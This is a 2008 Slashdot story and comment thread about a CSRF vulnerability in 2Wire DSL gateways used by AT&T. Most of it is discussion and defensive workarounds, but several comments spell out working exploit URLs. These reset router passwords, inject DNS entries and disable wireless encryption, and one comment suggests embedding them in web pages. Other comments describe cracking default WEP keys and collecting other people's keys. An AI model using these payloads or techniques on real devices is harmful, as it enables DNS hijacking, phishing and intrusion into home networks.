AT&T, 2Wire Ignoring Active Security Exploit [Updated]

← Back to Stories (view on slashdot.org)

AT&T, 2Wire Ignoring Active Security Exploit [Updated]

Posted by kdawson on Tuesday April 8, 2008 @08:51AM from the complicit-in-the-attacks dept.

An anonymous reader writes "2Wire manufactures DSL modems and routers for AT&T and other major carriers. Their devices suffer from a DNS redirection vulnerability that can be used as part of a variety of attacks, including phishing, identity theft, and denial of service. This exploit was publicly reported more than eight months ago and applies to nearly all 2Wire firmware revisions. The exploit itself is trivial to implement, requiring the attacker only to embed a specially crafted URL into a Web site or email. User interaction is not required, as the URL may be embedded as an image that loads automatically with the requested content. The 2Wire exploit bypasses any password set on the modem/router and is being actively exploited in the wild. AT&T has been deploying 2Wire DSL modems and router/gateways for years, so there exists a large vulnerable installed base. So far, AT&T/2Wire haven't done anything about this exploit." Update: 04/09 17:48 GMT by KD : AT&T spokesman Seth Bloom sends word that AT&T has not been ignoring the problem. According to Bloom: "The majority of our customers did not have gateways affected by this vulnerability. For those that did, as soon as we became aware of the issue, we expeditiously implemented a permanent solution to close the vulnerability. In fact, we've already updated the majority of affected 2Wire gateways, and we're nearing completion of the process. We've received no reports of any significant threats targeting our customers."

134 comments

I'm just glad... by bcat24 · 2008-04-08 08:57 · Score: 1

... I still have my old Speedstream 5100b. :)
1. Re:I'm just glad... by JeanBaptiste · 2008-04-08 09:06 · Score: 2, Funny
  
  my Hayes 300 laughs at you.
2. Re:I'm just glad... by b4dc0d3r · 2008-04-08 09:09 · Score: 2, Funny
  
  My roommate laughs at you through a cloud of smoke signals.
3. Re:I'm just glad... by Anonymous Coward · 2008-04-08 09:14 · Score: 0
  
  My SpeedStream 5300 started having problems last year, so I had to get a replacement... AT&T sent me a 2wire...
4. Re:I'm just glad... by Anonymous Coward · 2008-04-08 09:25 · Score: 3, Funny
  
  tell him to enjoy the blankets I sent
5. Re:I'm just glad... by value_added · 2008-04-08 09:34 · Score: 2, Interesting
  
  I still have my old Speedstream 5100b. :)
  
  I'm not sure I get the joke, but if it's funny, it might be even funnier that, IIRC, I have a model with a lower number. With the exception that it doesn't reset/resync after a power failure, I guess it works likes it's supposed to.
  
  On the other hand, I am concerned that should the little bugger fail, I'll have to purchase a newer model. Which means I'll end up with something with a metric ton of unwanted features.
  
  I know this isn't Ask Slashdot, but does anyone know whether it's possible to acquire, either through one's own DSL provider or elsewhere, a modem that's just a modem? Or is that just not possible these days? And maybe someone more knowledgable than the rest of us can comment on whether it's possible to "connect" to the thing in some way to read it's configuration.
6. Re:I'm just glad... by bcat24 · 2008-04-08 09:42 · Score: 1
  
  There was no joke intended, just a bit of gloating that I have a modem that still works perfectly and is secure (as far as I know).
7. Re:I'm just glad... by Zencyde · 2008-04-08 10:16 · Score: 1
  
  My friend needed a modem for his DSL connection after his 2Wire stopped working appropriately. Big surprise there. We picked one up for 50 bucks from Best Buy. It was tied to AT&T, though. Siemens makes some decent modems that are just modems. I personally use a WRT54G for my routing needs. I'm thinking of throwing OpenWRT onto it. I wish I had the L series, though. Those are built to throw different firmwares on.
  
  --
  What day is it? Could you please tell me?
8. Re:I'm just glad... by Kaenneth · 2008-04-08 10:36 · Score: 4, Funny
  
  Because 300 BPS modems were TOTALLY invulnerable to attacks...
  
  +++ATH0
9. Re:I'm just glad... by macslas'hole · 2008-04-08 10:37 · Score: 2, Funny
  
  I use a Speedstream 5100 too but no bloody a b or c.
  
  --
  Life's a tale told by an idiot, full of sound and fury, signifying nothing.
10. Re:I'm just glad... by Jeremiah+Cornelius · 2008-04-08 10:45 · Score: 1
  
  My old Alcatel looks like a grey shoe. And just chugs along...
  
  --
  "Flyin' in just a sweet place,
  Never been known to fail..."
11. Re:I'm just glad... by hurfy · 2008-04-08 12:10 · Score: 1
  
  lol, me and my 10 year-old cisco 675 are impressed ;)
  
  Sigh
  
  A URL should be an address, a picture should be a picture, and a song should be a song and none of the above should be DOING anything :(
12. Re:I'm just glad... by pfleming · 2008-04-08 12:32 · Score: 1
  
  lol, me and my 10 year-old cisco 675 are impressed ;)
  
  Sigh
  
  A URL should be an address, a picture should be a picture, and a song should be a song and none of the above should be DOING anything :( I bricked my 675 with a firmware update so I'm stuck with the 678.
13. Re:I'm just glad... by houstonbofh · 2008-04-08 12:52 · Score: 2, Interesting
  
  I got a brand new speedstream 4100 with my AT&T DSL connection 8 months ago. I just had to say at least 6 times, "Yes I really do want just a modem. No I do not want a 2wire. Yes I know what I am saying. Yes I know it is free with the rebate. No I still don't want it." I also had to lie and say I was using Windows just to get my DLS turned on. I guess it like for me to talk dirty...
14. Re:I'm just glad... by mzs · 2008-04-08 13:46 · Score: 1
  
  I second the Siemens modem and WRT54G AP. My subscription to AT&T came with a Siemens modem. It had really bad firmware on it. It would drop the connection all the time needing a reset. I flashed it with the newest firmware from Siemens and it has been rock solid since.
  
  I got the WRT54G before there was an L edition. I have been running HypreWRT thiobor on it, but that project seems to have disappeared so I may need to go to OpenWRT at some point.
  
  My folks have a 2Wire, I'll have to be on the look-out for a security update. I wonder if you can still get the Siemens modems from AT&T/SBC? I would recommend it if anyone can.
15. Re:I'm just glad... by Zencyde · 2008-04-08 13:55 · Score: 1
  
  I probably should have cleared this up. We got the modem about 6 months ago. I think they'd be more willing to ship single modems as they cost the company less, in the end. Of course, it's strictly by request. Most people love their wireless these days... causes a lot of issues in crowded areas, though. From my friend's old apartment I picked up over 10 different connections at any given time.
  
  --
  What day is it? Could you please tell me?
16. Re:I'm just glad... by prennix · 2008-04-08 17:19 · Score: 1
  
  Did you try flashing it back?! Bricked is such an overly used term. people give up too easily! Bricking should be followed up by some sort of qualifier, indicating the depths to which you've sunk to try to breath new life into the device. PLEASE don't sell us short!
17. Re:I'm just glad... by chrish · 2008-04-09 01:01 · Score: 1
  
  Depending on how stupid the terminal emulator software was (DOS apps, I'm looking at you), a simple
  
  NO CARRIER
  
  could cause a hang up.
  
  --
  - chrish
18. Re:I'm just glad... by pfleming · 2008-04-09 01:06 · Score: 1
  
  Did you try flashing it back?! Bricked is such an overly used term. people give up too easily! Bricking should be followed up by some sort of qualifier, indicating the depths to which you've sunk to try to breath new life into the device. PLEASE don't sell us short! It stopped responding completely. Power cycles, animal sacrifices, etc. and had a reddish glow from inside the unit. It was confirmed dead by Qwest and Netcraft and Qwest sent me a new unit.
Sasktel customers by compro01 · 2008-04-08 08:58 · Score: 1

anyone know if this affects the 2wire 2700 gateways?

--
upon the advice of my lawyer, i have no sig at this time
1. Re:Sasktel customers by bcat24 · 2008-04-08 09:01 · Score: 5, Informative
  
  From TFA:
  Vulnerable:
  2Wire 2071 Gateway 5.29.51
  2Wire 2071 Gateway 3.17.5
  2Wire 2071 Gateway 3.7.1
  2Wire 1800HW 5.29.51
  2Wire 1800HW 3.17.5
  2Wire 1800HW 3.7.1
  2Wire 1701HG 5.29.51
  2Wire 1701HG 3.17.5
  2Wire 1701HG 3.7.1
2. Re:Sasktel customers by compro01 · 2008-04-08 09:05 · Score: 4, Informative
  
  yeah, but DSLreports is reporting that the 2700s and 2701s are vulnerable, so i'm not sure which is correct
  
  --
  upon the advice of my lawyer, i have no sig at this time
3. Re:Sasktel customers by bcat24 · 2008-04-08 09:05 · Score: 1
  
  Oops, my mistake.
4. Re:Sasktel customers by Anonymous Coward · 2008-04-08 10:38 · Score: 0
  
  I wonder if my Telus one is also affected...
5. Re:Sasktel customers by moxley · 2008-04-08 11:04 · Score: 1
  
  I would trust dslreports (aka broadbandreports) over just about any other site.
  
  I've always found that site to be invaluable when dealing with any and all broadband issues; free tools to test your connection speed and security, as well as finding information about everthing from regulatory politics, technical support, etc to comparing how well your service performs compared to the guy who lives in the next city over.
  
  They also have some very informative forums as a lot of people who work on the technical front lines for broadband providers post stuff there before it hits the news or is announced by providers.
6. Re:Sasktel customers by Anonymous Coward · 2008-04-08 17:00 · Score: 0
  
  Sasktel, as well as Telus units are affected - I just tested it on my 2700 and was able to set the new password without needing the old one. Feel free to try it on yours http://192.168.1.254/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin - this is the URL someone connected to your unsecured wireless network can enter to reset your router's password (IP may vary if modified, the one used is a default). Information taken from http://www.securityfocus.com/bid/27516/exploit
7. Re:Sasktel customers by dadragon · 2008-04-08 17:57 · Score: 1
  
  The SaskTel default IP address is not in the 192.168 address range. I have tested this with a SaskTel router and it didn't work. Also, the SaskTel units are encrypted by default.
  
  Even substituting the correct address does not help. I can't get this exploit to work with a SaskTel unit. Some of them get to SaskTel's MDC console, for which the password is not publicly available. I'm sure it could be exploited if that became known.
  
  --
  God save our Queen, and Heaven bless The Maple Leaf Forever!
8. Re:Sasktel customers by dadragon · 2008-04-08 17:59 · Score: 1
  
  My SaskTel router's firmware version is 5.29.111.5. Looks a bit more recent.
  
  --
  God save our Queen, and Heaven bless The Maple Leaf Forever!
9. Re:Sasktel customers by Anonymous Coward · 2008-04-08 18:15 · Score: 0
  
  Try http://gateway.2wire.net/ or http://home/
10. Re:Sasktel customers by Anonymous Coward · 2008-04-08 18:24 · Score: 0
  
  There are many more exploits other than change the password field (DNS changes, resetting a password to default/custom et cetera) - however you can create workaround by changing your private network range and disabling the 2WIRE default hostnames. http://oleksiygayda.blogspot.com/2008/04/how-to-protect-your-2wire-router-from.html
11. Re:Sasktel customers by compro01 · 2008-04-09 03:37 · Score: 1
  
  i don't use sasktel DSL myself. i live in a rural area and use their DOCSIS-based wireless highspeed, which works fine, though it's pretty pricy at $60/month for 2m/256k. kicks the shit out of dial up, satellite, and xplorenet's wireless though.
  
  --
  upon the advice of my lawyer, i have no sig at this time
12. Re:Sasktel customers by dadragon · 2008-04-09 03:39 · Score: 1
  
  Those both do get to my router, but the changing admin password doesn't seem to work. As far as I know SaskTel's firmware is heavily modified to allow IPTV to work over the 2wire.
  
  --
  God save our Queen, and Heaven bless The Maple Leaf Forever!
13. Re:Sasktel customers by Guppy · 2008-04-09 05:19 · Score: 1
  
  Hmm... wonder if the 1000HW my aunt uses is vulnerable? As a pretty-much obsolete unit, it's old enough that it might fall off the list simply because of its age.
14. Re:Sasktel customers by wiedzmin · 2008-04-19 02:40 · Score: 1
  
  Try these http://www.securityfocus.com/bid/27246/exploit
  
  --
  Bow before me, for I am root.
Anybody have any ideas... by Thelasko · 2008-04-08 09:00 · Score: 2, Funny

on how to walk my mom through changing her IP scheme and modify the hosts file? Do I have to go over there?

--
One of our competitors trademarked the term "hypothesis". From now on, we will call them "boneheaded ideas".
1. Re:Anybody have any ideas... by Anonymous Coward · 2008-04-08 09:03 · Score: 3, Funny
  
  Nah, I already got that for her.
2. Re:Anybody have any ideas... by trongey · 2008-04-08 09:24 · Score: 5, Funny
  
  ...how to walk my mom through changing her IP scheme and modify the hosts file? Do I have to go over there? Oh, come on. Don't be so lazy. It won't kill you to walk up the stairs and across the living room.
  
  --
  You never really know how close to the edge you can go until you fall off.
3. Re:Anybody have any ideas... by Anti_Climax · 2008-04-08 09:30 · Score: 2, Insightful
  
  Most of them have wireless, provided he's getting good coverage in the basement he could do it from there.
  
  --
  Even people that believe in pre-destiny look both ways before crossing the street.
4. Re:Anybody have any ideas... by rickb928 · 2008-04-08 10:23 · Score: 1
  
  WinVNC
  
  --
  deleting the extra space after periods so i can stay relevant, yeah.
5. Re:Anybody have any ideas... by amRadioHed · 2008-04-08 10:56 · Score: 1
  
  The wireless on mine sucks horribly. I tried it for about a day but gave up on it and hooked my old linksys back up.
  
  --
  We hope your rules and wisdom choke you / Now we are one in everlasting peace
6. Re:Anybody have any ideas... by Anti_Climax · 2008-04-08 17:44 · Score: 1
  
  If you have an HG model, the wireless has a power setting in the user interface. I know from personal experience that it's powerful enough on full power to make my Centrino radio shut down if I set my laptop within 6 feet of my gateway.
  
  Looking inside mine, they have 3 loop antennas, and it seems to have the best coverage from the "front" of the gateway.
  
  And a friend of mine had a linksys adapter that had a jacked up non-standard 802.11g implementation and it only connects to a 2wire when it's set to b only mode.
  
  --
  Even people that believe in pre-destiny look both ways before crossing the street.
7. Re:Anybody have any ideas... by Anonymous Coward · 2008-04-09 18:40 · Score: 0
  
  Just send her this:
  http://www.mvps.org/winhelp2002/hosts.htm ...and walk her though running the bat file.
sweet... by spotdog14 · 2008-04-08 09:00 · Score: 1

that sucks... Wow, i believe this is the ONLY thing that makes me be glad that i am a comcast customer.
Funny Post by Anonymous Coward · 2008-04-08 09:01 · Score: 3, Funny

Me Chinese
Exploit SOCKS,
Me put malware
On your box!
1. Re:Funny Post by bcat24 · 2008-04-08 09:04 · Score: 5, Informative
  
  That would be slightly funnier if the exploit actually involved SOCKS. In reality, it looks like a simple CSRF attack. (Is it just me, or are we seeing a lot more of those lately?)
2. Re:Funny Post by Anonymous Coward · 2008-04-08 09:19 · Score: 0
  
  God I love this. So much.
3. Re:Funny Post by Anonymous Coward · 2008-04-08 09:30 · Score: 0
  
  Okay, bcat, are you saying that I can minimize my danger level by clearing all cookies each time I leave my bank's site? I have Firefox set to clear each time I log out; but that may not be enough?
4. Re:Funny Post by rhizome · 2008-04-08 10:48 · Score: 1, Insightful
  
  Fine, replace the line with "CSRF rocks" (pronouncing the acronym as "sea surf").
  
  --
  When I was a kid, we only had one Darth.
5. Re:Funny Post by Nikker · 2008-04-08 12:04 · Score: 1
  
  Okay, bcat, are you saying that I can minimize my danger level by clearing all cookies each time I leave my bank's site? I have Firefox set to clear each time I log out; but that may not be enough?
  
  Not really. A DNS server takes a name and gives you the 'physical' server that will give you that page. So if I route all your pages to my physical computer I can download the real page and send it to you as the real deal. Of course someone less honest might check the data that was entered before it passes it back.
  
  --
  A loop, by its nature, continues. If that didn't make sense, start reading this sentence again.
Re:Anybody have any ideas... Duh. by Anonymous Coward · 2008-04-08 09:03 · Score: 0

Just hack her. Saves time AND MONEY.
Ignored? by Anonymous Coward · 2008-04-08 09:04 · Score: 0

It's not being ignored. However, telcos like to have security fixes tested before sending them out to a few million gateways.
1. Re:Ignored? by compro01 · 2008-04-08 09:10 · Score: 1
  
  tested for 6 months?
  
  --
  upon the advice of my lawyer, i have no sig at this time
2. Re:Ignored? by Bryansix · 2008-04-08 09:42 · Score: 1
  
  Randall L. Stephenson is that you?
Class action lawsuit by Anonymous Coward · 2008-04-08 09:08 · Score: 0

Need I say more? If people don't react, they deserve to be screwed.
OK, now we all know by hyades1 · 2008-04-08 09:14 · Score: 1, Interesting

What's these bastards' excuse for standing around with their thumb up their bum for eight months while people get their lives turned inside out?
I smell lawsuits. Many, many lawsuits.

--
I've calculated my velocity with such exquisite precision that I have no idea where I am.
1. Re:OK, now we all know by eonlabs · 2008-04-08 11:40 · Score: 2, Insightful
  
  Easy, if they think it's no skin off their back for not updating their hardware, they think they can save money by not doing it. If they have 10,000 customers and it's $100 to replace one of their old modems, then it's a million bucks to swap them all out. If they don't think there's a risk of being held responsible for more than that for not changing their hardware, where is the incentive.
  
  Hell, the security flaws typically affect the customer. Will that stop most people's internet addictions?
  
  Here's another one... How many places does At&t hold a local monopoly? What other options doe people have, especially if they're dealing with constant (Video/Voice)oip? That stuff costs bandwidth and with more computers shipping with cameras and mics built in, more people are using it. A dialup line, and even a decent DSL can't really handle streaming video like that.
  
  --
  I wouldn't consider the mad hatter mad. Just reality impaired. He sure can make a mean cup of tea.
2. Re:OK, now we all know by AngelofDeath-02 · 2008-04-08 15:07 · Score: 1
  
  Of course, they can just push the firmware over their systems. They can flag a particular update across modems in a given category, and deem it as mandatory.
  
  There's always the possibility that it might brick the modem... But it's not a 100% chance. It's not even a good chance. Also - those modems do not cost 100 bucks, even after you include tech support man hours and shipping costs...
  
  I can't see the post you're replying to, so I can only guess that the firmware exploit is what you're referring to, but they do not need to replace those modems to force a firmware update.
  
  --
  No, I am not an English major. My posts are subject to typos and incorrect grammar. Do not expect perfection.
Exploit doesn't seem to work on my 2700HG-B by Anonymous Coward · 2008-04-08 09:15 · Score: 5, Informative

I tried their example for adding example.com to DNS (here as not a live link; copy it paste it yourself at your own risk):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1
and all it did was leave me at the "enter system password" page. Yes, my router has a non-default system password. The system software release is 4.25.19.
1. Re:Exploit doesn't seem to work on my 2700HG-B by Anonymous Coward · 2008-04-08 09:41 · Score: 1, Informative
  
  A couple users at DSLreports indicated hat the hack is able to change the password on 4.25.19 firmware: http://www.dslreports.com/forum/r19987755-2Wire-Cross-Site-Request-Forgery-Vulnerability
  
  Perhaps the hacker could change the password, then follow it up with a DNS entry.
2. Re:Exploit doesn't seem to work on my 2700HG-B by skis · 2008-04-08 09:53 · Score: 5, Informative
  
  This exploit is CSRF (Cross-site request forgery). This means that you have to have an active authenticated session to your router in your browser. When you click the link and your browser is already authenticated, it will send your session cookie along with the HTTP request, and the web server in your router will know you are already authenticated, and execute the command you gave it.
  
  Try logging in to your router, open a new tab, and click on that link again and see if it works.
3. Re:Exploit doesn't seem to work on my 2700HG-B by Clueless+Moron · 2008-04-08 11:28 · Score: 2, Interesting
  
  I'm sure that if I was already logged into my router, that link would work, because I know the 2wire uses cookie based authentication.
  
  But why on earth would I be logged into it??? Its status pages do not require a login, so the only reason to log in would be to change something, which happens maybe once a year. And the session times out after a few minutes.
  
  TFS (The Fine Summary) says "the 2Wire exploit bypasses any password set on the modem/router" which is blatantly false: apparently it works only if you happen to have logged into an admin page on the router within the past few minutes, which is remarkably unlikely.
  
  My guess is that the "exploit" is fundamentally relying on people not having changed the default router password. That way, the initial URL to set the password will work, and after that the router is pwn3d.
  
  Moral? Set your stupid default router password. Just like with any router.
4. Re:Exploit doesn't seem to work on my 2700HG-B by Clueless+Moron · 2008-04-08 12:00 · Score: 2, Informative
  
  (replying to myself...)
  
  apparently it works only if you happen to have logged into an admin page on the router within the past few minutes, which is remarkably unlikely.
  
  Ok, I see the problem now: although just about every setup page imaginable on the router uses a session cookie to make sure you have logged in, the "set initial router password" page does not, and does not care if an initial password has already been set (stupid!).
  
  So the 'sploit is to first invoke the "set initial router password" page. It doesn't matter what it sets it to, because completing that page logs you in, and so your browser gets the session cookie and now all the other pages work. Such as the one that adds www.example.com to DNS.
  
  Nice. Fortunately my home system doesn't use the 2wire DNS at all.
5. Re:Exploit doesn't seem to work on my 2700HG-B by BungaDunga · 2008-04-08 19:10 · Score: 1
  
  Funny, I seem immune but only because my router's default config ip address is different. Still pops up the DNS entry form with example.com filled in if I put in the right ip address, rather scary.
6. Re:Exploit doesn't seem to work on my 2700HG-B by Anonymous Coward · 2008-04-09 07:28 · Score: 0
  
  There is another vulnerability, a PoC has been published some months ago:
  
  http://2wire-poc.blogspot.com/
  
  http://www.securityfocus.com/bid/27516
In related news... by gmuslera · 2008-04-08 09:26 · Score: 1

... wont be much surprised if most of the Kraken botnet (or other so widespread malware) are mostly behind 2Wire routers.
I'm not suprised, given my experience with 2wire by krovisser · 2008-04-08 09:29 · Score: 4, Interesting

One of the worst routers I have ever had. Besides resetting itself arbitrarily, it would forget it's own settings and revert to the default, or half of the settings would revert to the default and the other half.... ? Also, right before I threw it out my window, it forgot it was a wireless router completely. I mean, it reset itself one last time and quit broadcasting completely. Even the setup pages lost the wireless part. I could manually enter in the wireless setup URL, and it would show one with random values in each field.

I'm just waiting for a nice cooler day to take it to the shooting range. The manual traps and some shotgun pellets might make up for all my anguish.
Bridge Mode by John+Hasler · 2008-04-08 09:31 · Score: 4, Insightful

Never trust these combination modem/router/firewalls. Put the thing in bridge mode and run a real router behind it (such as an old pc running Debian or OpenBSD or even an old Cisco).

--
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
1. Re:Bridge Mode by Anonymous Coward · 2008-04-08 09:41 · Score: 0
  
  ... and guess what OS the 2wires run o wise one. check the mdc logs and be amazed.
2. Re:Bridge Mode by twinkdogg · 2008-04-08 09:44 · Score: 1
  
  yeah, i've got an old redhat 7.3 firewall running on a Pentium 266 with 128MB ram that works great
3. Re:Bridge Mode by twinkdogg · 2008-04-08 09:50 · Score: 1
  
  Yeah but 2wire is using http administration.
4. Re:Bridge Mode by jtn · 2008-04-08 10:30 · Score: 1
  
  Difficult when you CANNOT due to limitations of your provider. Anyone who has AT&T's U-verse product *must* run the 2WIRE box in router mode. There is no other choice.
5. Re:Bridge Mode by robo_mojo · 2008-04-08 11:02 · Score: 1
  
  Difficult when you CANNOT due to limitations of your provider. Anyone who has AT&T's U-verse product *must* run the 2WIRE box in router mode. There is no other choice.
  Sure there's another choice. You can always attach another router to it which does DNS recursion (not forwarding). Or do the DNS recursion on your computer with BIND 9 or other software.
6. Re:Bridge Mode by roju · 2008-04-08 11:16 · Score: 2, Funny
  
  Perhaps if we're worried about security issues, administrating a local copy of BIND isn't the greatest plan.
7. Re:Bridge Mode by clesters · 2008-04-08 13:31 · Score: 1
  
  Yes because we all know that old Cisco routers are not vulnerable to anything.
8. Re:Bridge Mode by maz2331 · 2008-04-08 13:59 · Score: 1
  
  I'd say BIND is better than the stuff built into these cheapie routers. At least I can update it myself.
9. Re:Bridge Mode by robo_mojo · 2008-04-08 14:08 · Score: 1
  
  None of the items on that page are BIND, and half of them are Microsoft products. Use the Preview Button! Check those URLs!
  
  I'd rather take my chances with administering DNS software on my network than risk using a vulnerable router, anyway.
10. Re:Bridge Mode by baomike · 2008-04-08 14:55 · Score: 1
  
  Exactly. You have control. I have used slack for years to run a dual homed host. Iptables, BIND and SNORT and away you go .
  It takes some set up , and some care in the set up but maintenance is nil.
  
  I left one ISP somewhat perplexed when he tried to convert me to PPOE. I found an ISP in Portland OR (DSL only)that will provide bridge mode and we linked up.
11. Re:Bridge Mode by multimed · 2008-04-08 16:11 · Score: 1
  
  I'm running in bridge mode - I already had a perfectly good (definitely better than 2wire) wireless router but I think even if I didn't already have one, I'd still bridge it & buy a real router. But this is most certainly not for the average joe. I struggled finding good documentation on how to do it and it was still some trial & error. They definitely don't support or encourage this - on the contrary it seemed convoluted & difficult to me.
  
  --
  Vote Quimby.
12. Re:Bridge Mode by roju · 2008-04-09 02:11 · Score: 1
  
  Yeah I noticed the URL issue just after hitting Submit. Turns out that their search engine uses POST for searching. Very disappointing.
  
  My concern about running BIND locally is that there will _always_ be another patch, and unless there's somebody dedicated to keeping it patched, it's going to fall behind.
13. Re:Bridge Mode by kcbanner · 2008-04-09 05:18 · Score: 1
  
  I run an obsd router and have the 2wire as the wireless bridge for my network...its in such a state of disrepair that I can't access the http admin on the router at all, it doesn't respond to any IP address, yet somehow it still happily bridges my wired net to my wireless...even dhcp pass through works to the obsd router from wireless clients. The scary part is that it is impossible to access (if you forget your password on these (no hardware reset (unless you open it up and do it manually), you actually have to *phone* the company (number doesn't work) and get it reset.). Nothing on these routers works properly (they sent me one when I got adsl, its a combo modem/router. It has an ethernet WAN port, but there was an empty rj45 plug jammed in it (it doesn't actually work). I just use an older adsl modem with the obsd router and have this thing in the corner as a wireless bridge. What a hunk of junk.
  
  --
  Obligatory blog plug: http://www.caseybanner.ca/
Large install base by Verteiron · 2008-04-08 09:36 · Score: 2, Interesting

I can detect 4 of these routers from inside my house, all using the SSID 2WIRE. There must be tens of thousands of these things out there, the vast majority running the default, unsecured configuration...

--
End of lesson. You may press the button.
1. Re:Large install base by cicatrix1 · 2008-04-08 10:13 · Score: 1, Insightful
  
  By default they come with 32 bit WEP, I think. It's technically not "unsecured", but the difference is basically negligible :p
  
  --
  
  I know more than you drink.
2. Re:Large install base by compro01 · 2008-04-08 10:58 · Score: 1
  
  must be a local thing, as all the 2wire's sasktel uses (the 2700 gateways) come defaulted with WEP. used to be WPA, but too many people complained about it not working with stupid hardware (usually nintendo DS) not working with it.
  
  --
  upon the advice of my lawyer, i have no sig at this time
3. Re:Large install base by krovisser · 2008-04-08 11:21 · Score: 1
  
  Haha, yeah there's about 10 of those 2wireXXXX from my place too. Most of them are WPA, which is surprising.
4. Re:Large install base by Erpo · 2008-04-08 17:05 · Score: 4, Informative
  
  By default they come with 32 bit WEP
  
  You're closer to the truth than you know. They use 64 bit (i.e. 8 byte) WEP by default, which is really 40 bit (i.e. 5 byte) WEP since three of those bytes are the IV and broadcast in the clear. However, 2WIRE has an awful policy of printing the WEP key on the side of the modem in hex format and not using the digits A through F.
  
  So the default key, written in hex, is a "decimal" number somewhere between 0,000,000,000 and 9,999,999,999. That's only 10 billion possibilities, or about 33.2 bits of entropy. Your computer can crack through that in a day or two with only three or four captured packets.
  
  When I discovered this (and, of course, got stonewalled by 2WIRE), I wrote a patch for aircrack (now aircrack-ng) that programs it to search only the binary coded decimal keyspace. I named this option -t in honor of "Two Wire" for their terrible security.
from the DSL reports forums by Some_Llama · 2008-04-08 09:42 · Score: 5, Informative

You can implement a temporary fix yourself. The first post in the following thread describes how to protect yourself until 2wire fixes the issue 2Wire Cross Site Request Forgery Vulnerability .

Here is a short summary:

First, change the IP scheme that the 2wire is using for your home network. Specifically, change the IP address of the 2wire router itself. This will prevent attacks against 192.168.1.254.

Next you have to prevent attacks against the domains "home" and "gateway.2wire.net". You can do this a couple of ways. You can modify your hosts file and point those domains to 127.0.0.1... or you can hardcode the dns settings into your computer so that your computer is not using the 2wire to resolve domain names.

Of course the bottom line is 2wire needs to plug this hole. When will that happen? Who knows.
1. Re:from the DSL reports forums by nawcom · 2008-04-08 10:00 · Score: 1
  
  awww. don't be such a llama. we want the shell script that automates the attack, not a solution to fix the problem. silly alpaca...this is slashdot. erm. :-P
2. Re:from the DSL reports forums by fermion · 2008-04-08 10:55 · Score: 1
  
  Suppose one has never trusted the equipment that came from the telco, and have never connected anything but a single firewall/router to the telco DSL box. Does the vulnerability still matter? I assume that the telco is giving us the cheapest crap it can, and should not be trusted beyond the limits of liability to the telco.
  
  --
  "She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
3. Re:from the DSL reports forums by Some_Llama · 2008-04-08 11:29 · Score: 1
  
  from readint eh exploit you would have to visit a malicious website that sends an link that your browsers processes, the link is actually the default address of the 2wire device (198.162.1.254, OR default domain of "home" or "gateway.2wire.net") in this "url" is the command to reset the password or any other configuration change.
  
  So what would happen in worse case to a default router is it could have it's configuration changed.. whether it matters to you is dependant on how much access you give that router to the rest of your network (as these are typically routers+modem). in your case i would make sure the firewall/router has a different internal ip addressing scheme than the 2wire device, that should provide a buffer?
  
  I personally have this exact same setup at home, i use the 2wire as just a wireless router for my Wii and then it connects to my normal router for my network which has the wan uplink to the DSL modem. Since the wireless router only gets internet access and it not allowed to see anything else on the network it shouldn't matter?
4. Re:from the DSL reports forums by Some_Llama · 2008-04-08 11:32 · Score: 2, Interesting
  
  you don't need a script, just add this link to your webpage and force people to execute it on load:
  
  http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS
  
  you can change the commands to do a number of different actions (pretty much any configuration change on any page in the router)
  
  eg:
  
  Add names to the DNS:
  http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.example.com&ADDR=127.0.0.1
  
  Disable Wireless Authentication
  http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0
  
  Set Dynamic DNS
  http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE
  
  you can also change the 192.168.1.254 to say "home" or "gateway.2wire.net"
  
  eg:
  Set Dynamic DNS
  http://gateway.2wire.net/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE
5. Re:from the DSL reports forums by Dare+nMc · 2008-04-08 15:23 · Score: 1
  
  have never connected anything but a single firewall/router to the telco DSL box. Does the vulnerability still matter?
  
  sounds like it. Apparently only if you changed the default ip address of the 2 wire box, or had a reason to not use the DNS cache from within it, would this have helped deflect this vulnerability. (after all, NAT still lets you "out" to the router, where the vulnerability is.)
  
  Although it appears firefox with script block would have stopped this.
Re:I'm not suprised, given my experience with 2wir by MightyMartian · 2008-04-08 10:00 · Score: 1

I have to deal with a 2700 for one of remote locations (or have to deal with it until next month, when we get a useful router/modem). What a piece of shit. The software is so bunged up that I can't even get rid of customized open app ports. What a horrendous piece of shit. Who designs these things? They should be taken out and have their brains removed, though it's likely they wouldn't notice, with firmware as faulty as that which they put in their routers.

--
The world's burning. Moped Jesus spotted on I50. Details at 11.
Prodigy and Banamex by Anonymous Coward · 2008-04-08 10:01 · Score: 0

Probably as bad...

Speadstream is deployed by Prodigy infinitum In Mexico, it even has been recalling the old speadstream modems form their useras, that does not have this exploit, yet there is no warning to the subscriber of this flaw

Also in Mexico it has been used to redirect the page of www.banamex.com, one of the most importantas banks of Mexico.

First using false postcards form one popular site www.gusanito.com , and now is using false youtube invitations.

Banamex also is not resporting this to its users, and their tehc department acts as if thery were unaware of the problem, asking to reinstall windows etc... when they know it is the modem.

I already know several people who has lost money, even as some users are trying to spead the word.

So who is the culprit 2wire, prodigy, or Banamex... ?
Their DNS sucks too by Anonymous Coward · 2008-04-08 10:02 · Score: 0

Their DNS implementation puts A records in the response section of a reply to an AAAA request too.

The thing is useless.
2Wire routers also very weak on WEP by Jeffrey+Baker · 2008-04-08 10:04 · Score: 4, Interesting

2Wire access points also come hard-coded for 56-bit WEP, which can be cracked in seconds. I have a list of hundreds of WEP keys I got just from riding my bicycle around San Francisco with a laptop chugging away in my backpack. These are by far the worst access points ever deployed, and they are, sadly, also the most widely deployed in the USA.
1. Re:2Wire routers also very weak on WEP by interval1066 · 2008-04-08 10:16 · Score: 0
  
